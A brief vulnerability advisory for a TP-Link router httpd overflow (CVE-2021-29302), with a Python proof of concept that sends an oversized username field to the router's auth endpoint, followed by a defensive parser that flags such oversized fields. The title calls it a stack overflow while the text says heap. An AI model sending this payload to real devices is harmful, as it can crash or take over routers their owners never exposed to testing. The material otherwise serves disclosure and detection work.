# TP-Link stack overflow vulnerability (CVE-2021-29302)

A buffer overflow occurs when the httpd process parses the HTTP message body, which may lead to remote code execution. For example, when the router password is set for the first time, the http daemon does not validate the incoming HTTP message. If the transmitted username or password is too long, the httpd process's heap space overflows.

Affected versions:

V4_200 <= 2020.06

PoC has been published: https://github.com/liyansong2018/CVE/tree/main/2021/CVE-2021-29302

```py
import requests

# Request headers as used by the published PoC. Note that requests recomputes
# Content-Length from the body, so the hard-coded "78" is only cosmetic.
headers = {
    "Host": "192.168.0.1",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Accept": "*/*",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "text/plain",
    "Content-Length": "78",
    "Origin": "http://192.168.0.1",
    "Connection": "close",
    "Referer": "http://192.168.0.1/"
}

# Oversized "name" field: 512 'a' followed by 1024 'b' (1536 bytes in total),
# far longer than the first-time password setup handler expects.
payload = "a" * 512 + "b" * 1024

# TP-Link httpd body format: a bracketed CGI section header followed by
# CRLF-separated key=value fields.
formdata = "[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\nname={}\r\noldPwd=admin\r\npwd=lys123\r\n".format(payload)

# Route the request through a local intercepting proxy so it can be inspected.
proxies = {
    "http": "http://127.0.0.1:8080",
}

url = "http://192.168.0.1/cgi?8"
response = requests.post(url, data=formdata, headers=headers, proxies=proxies)
print(response.text)  # Python 3 syntax; the original used the Python 2 print statement
```

ref:

* https://github.com/liyansong2018/CVE/tree/main/2021/CVE-2021-29302
* https://nvd.nist.gov/vuln/detail/CVE-2021-29302
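A defender-side check, added here as an example and not part of the original post or the PoC repository: it parses the TP-Link CGI body format used by the request above and flags `/cgi/auth` fields that exceed a length limit, the kind of rule a WAF or IDS in front of the router's httpd could apply. `MAX_FIELD_LEN`, the function names and the sample bodies are assumptions constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Assumed defender-side limit (not from the advisory): legitimate TP-Link admin
# usernames and passwords are short, so longer /cgi/auth fields are suspicious.
MAX_FIELD_LEN = 64

# Section header as in the PoC body: "[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,3"
SECTION_RE = re.compile(r"^\[(?P<path>/[^#\]]*)(?:#[^\]]*)?\](?P<meta>[\d,]*)$")


def parse_tplink_body(body: str) -> List[Tuple[str, Dict[str, str]]]:
    """Split a TP-Link httpd body into (cgi_path, {field: value}) sections."""
    sections: List[Tuple[str, Dict[str, str]]] = []
    current_path = None
    fields: Dict[str, str] = {}
    for line in body.split("\r\n"):
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:  # new bracketed section header
            if current_path is not None:
                sections.append((current_path, fields))
            current_path, fields = m.group("path"), {}
        elif current_path is not None and "=" in line:  # key=value field
            key, _, value = line.partition("=")
            fields[key] = value
    if current_path is not None:
        sections.append((current_path, fields))
    return sections


def find_oversized_auth_fields(body: str, limit: int = MAX_FIELD_LEN) -> List[Tuple[str, int]]:
    """Return (field, length) for every /cgi/auth field longer than `limit`."""
    hits = []
    for path, fields in parse_tplink_body(body):
        if path == "/cgi/auth":
            hits.extend((k, len(v)) for k, v in fields.items() if len(v) > limit)
    return hits


# Constructed samples: a benign first-time password change and a body shaped
# like the PoC (512 'a' + 1024 'b' in the name field).
HEADER = "[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\n"
BENIGN_BODY = HEADER + "name=admin\r\noldPwd=admin\r\npwd=lys123\r\n"
OVERSIZED_BODY = HEADER + "name=" + "a" * 512 + "b" * 1024 + "\r\noldPwd=admin\r\npwd=lys123\r\n"

if __name__ == "__main__":
    print(find_oversized_auth_fields(BENIGN_BODY))     # []
    print(find_oversized_auth_fields(OVERSIZED_BODY))  # [('name', 1536)]
```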
